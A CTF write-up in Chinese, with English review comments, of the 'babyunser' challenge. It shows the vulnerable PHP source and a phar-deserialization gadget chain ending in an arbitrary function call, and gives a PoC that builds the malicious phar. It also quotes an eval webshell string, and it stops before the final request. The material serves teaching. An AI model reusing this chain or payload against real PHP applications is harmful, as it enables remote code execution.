[SWPUCTF 2021 新生赛]babyunser

[SWPUCTF 2021 新生赛]babyunser

尝试上传文件,发现上传后的文件一律被保存为 .txt 文件

通过文件查看功能可以读到源码

read.php

<?php
// read.php entry point: takes the path from POST field "file" and loads it
// through zz::getFile(). zz is defined in class.php on this page; the
// include is not visible in this listing.
error_reporting(0); // turns off PHP error reporting for this request
$filename=$_POST['file'];
// The field is read before it is checked; a missing field leaves $filename
// null, so the script still exits here without output.
if(!isset($filename)){
    die();
}
// The request-supplied string is passed to zz unchanged. The only validation
// is the pattern check in zz::filter(), which getFile() runs before reading.
$file=new zz($filename);
$contents=$file->getFile();
?>

upload.php

<?php
    // Upload handler: runs only when POST field "submit" is present.
    if(isset($_POST['submit'])){
        // The stored name is md5 of the current timestamp plus ".txt"; the
        // client-supplied file name and extension are not used.
        $upload_path="upload/".md5(time()).".txt";
        $temp_file = $_FILES['upload_file']['tmp_name'];
        // NOTE(review): no size or content check is visible in this listing.
        // Forcing ".txt" presumably keeps the file from being run as a
        // script, but it does not constrain the bytes stored: code that
        // later opens this path through a stream wrapper still parses the
        // content, whatever the extension says.
        if (move_uploaded_file($temp_file, $upload_path)) {
            echo "文件路径:".$upload_path; // the stored path is returned to the client
        } else {
            $msg = '上传失败'; // $msg is not used anywhere in this listing
        }
    }

class.php

<?php
/**
 * Holder for a single $name property.
 *
 * NOTE(review): __destruct() passes $name to strtolower(), which converts a
 * non-string argument to a string. If $name holds an object that defines
 * __toString(), destroying an aa instance calls that method, so this
 * destructor is the entry point for the object chain built later on this
 * page. A destructor should not process properties that can be restored
 * from serialized data.
 */
class aa{
    public $name;
 
    /** Sets the default name 'aa'. */
    public function __construct(){
        $this->name='aa';
    }
 
    /** Lower-cases $name on destruction; the result is only stored back. */
    public function __destruct(){
        // String conversion of $name happens here (see class note).
        $this->name=strtolower($this->name);
    }
}
 
/**
 * Holds a private $content value and a public method name in $func.
 *
 * NOTE(review): __get() turns a read of any inaccessible or undefined
 * property into a method call whose target object, method name and argument
 * all come from data outside this class (restored properties and the
 * request). Magic accessors should not dispatch calls.
 */
class ff{
    private $content;
    public $func;
 
    /**
     * Sets $content to a literal string containing PHP source that evals a
     * POST field. Nothing in this listing writes or executes that string.
     */
    public function __construct(){
        $this->content="\<?php @eval(\$_POST[1]);?>";
    }
 
    /**
     * Runs when an inaccessible or undefined property $key is read.
     * Nothing is returned, so the property read evaluates to null.
     */
    public function __get($key){
        // Calls the method named by $this->func on whatever is stored in the
        // property named $key, passing POST field "cmd" as the argument.
        $this->$key->{$this->func}($_POST['cmd']);
    }
}
 
/**
 * File reader used by read.php: wraps a path, applies a pattern filter and
 * returns the file contents.
 *
 * NOTE(review): this class is both the place where a request-controlled
 * path reaches file_get_contents() and, through __toString() and write(),
 * a link in the object chain described on this page.
 */
class zz{
    public $filename;
    public $content='surprise';
 
    /** Stores the path exactly as given; no validation happens here. */
    public function __construct($filename){
        $this->filename=$filename;
    }
 
    /**
     * Stops the request when the path starts with "/" or contains "php:",
     * "data", "zip" or "../" (case-insensitive).
     *
     * NOTE(review): this is a denylist. Any scheme or pattern not listed
     * passes, including the phar wrapper this write-up relies on. A safer
     * check resolves the path and accepts it only when it lies inside one
     * fixed directory, rejecting every "scheme://" form.
     */
    public function filter(){
        if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){
            die('这不合理');
        }
    }
 
    /**
     * Unfinished method: reads the property named $var from $this->filename
     * and discards the result; $filename and $lt are never used.
     *
     * NOTE(review): when $this->filename is an object, this property read
     * can invoke that object's __get().
     */
    public function write($var){
        $filename=$this->filename;
        $lt=$this->filename->$var;
        // this feature is abandoned; not going to finish it
    }
 
    /**
     * Runs filter(), then reads the path with file_get_contents().
     * Returns the contents, or ends the request with "404 not found" when
     * the read fails or the result is empty (a file containing only "0"
     * also counts as empty).
     *
     * NOTE(review): on PHP versions before 8.0, opening a phar:// path with
     * a file function unserializes the archive's metadata, which restores
     * attacker-chosen objects of the classes in this file. PHP 8.0 and
     * later no longer do this automatically.
     */
    public function getFile(){
        $this->filter();
        $contents=file_get_contents($this->filename);
        if(!empty($contents)){
            return $contents;
        }else{
            die("404 not found");
        }
    }
 
    /**
     * Runs when the object is used as a string; returns $content.
     *
     * NOTE(review): before returning, it calls the method of this object
     * named by POST field "method" with POST field "var" as the argument,
     * so the request selects which method runs. Dispatch on a
     * request-supplied name should go through a fixed allowlist, if at all.
     */
    public function __toString(){
        $this->{$_POST['method']}($_POST['var']);
        return $this->content;
    }
}
 
/**
 * Holds $name and $arg and forwards undefined method calls to functions.
 *
 * NOTE(review): __call() is the sink of the chain. It treats the name of
 * any undefined method as a function name and calls it with the first
 * argument, so whoever controls the method name and argument chooses the
 * function that runs.
 */
class xx{
    public $name;
    public $arg;
 
    /** Sets defaults; $name and $arg are not read anywhere in this listing. */
    public function __construct(){
        $this->name='eval';
        $this->arg='phpinfo();';
    }
 
    /**
     * Runs when an inaccessible or undefined method is called on the object.
     * $name is the method name used by the caller, $arg its argument list.
     */
    public function __call($name,$arg){
        // Variable function call: invokes the function called $name.
        $name($arg[0]);
    }
}

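顺着魔术方法构造利用链:aa::__destruct() 中的 strtolower() 把 $name 当作字符串处理,触发 zz::__toString();__toString() 按请求参数调用 zz 自身的方法,其中 write() 读取 $this->filename->$var,在 ff 对象上触发 ff::__get();__get() 又在 xx 对象上调用一个不存在的方法,最终进入 xx::__call()。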

poc

<?php
// Stand-in for the target's aa class. Only the property layout matters for
// serialization; $name is set to a zz object instead of a string.
class aa{
    public $name;
    function __construct(){
        $this->name = new zz();
    }
}
 
// Stand-in for the target's ff class: the private $content holds an xx
// object and $func is preset to "assert".
// NOTE(review): this relies on assert() evaluating a string argument, which
// was deprecated in PHP 7.2 and removed in PHP 8.0, so the chain as written
// only applies to older PHP versions.
class ff{
    private $content;
    public $func = "assert";
    function __construct(){
        $this->content = new xx();
    }
}
 
// Stand-in for the target's zz class: $filename holds an ff object rather
// than a path; $content keeps the same default as the original class.
class zz{
    public $filename;
    public $content='surprise';
    function __construct(){
        $this->filename = new ff();
    }
 
}
 
// Stand-in for the target's xx class: same two properties, left unset.
class xx{
    public $name;
    public $arg;
}
 
// Builds the nested object graph (aa -> zz -> ff -> xx) and prints its
// URL-encoded serialized form. The archive below stores the object itself,
// not this printed string.
$a = new aa();
echo urlencode(serialize($a));
 
# the part below was left unchanged
// NOTE(review): for defenders, the stub marker "__HALT_COMPILER();" set
// below is part of every phar archive, so it is a usable signature when
// scanning uploaded files regardless of their extension.
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub
 
$phar->setMetadata($a); // store the custom metadata in the manifest
$phar->addFromString("test.txt", "test"); // add a file to the archive
// the signature is computed automatically
$phar->stopBuffering();

运行上面的脚本生成 phar 文件,然后通过上传页面上传

然后在read.php 这里post
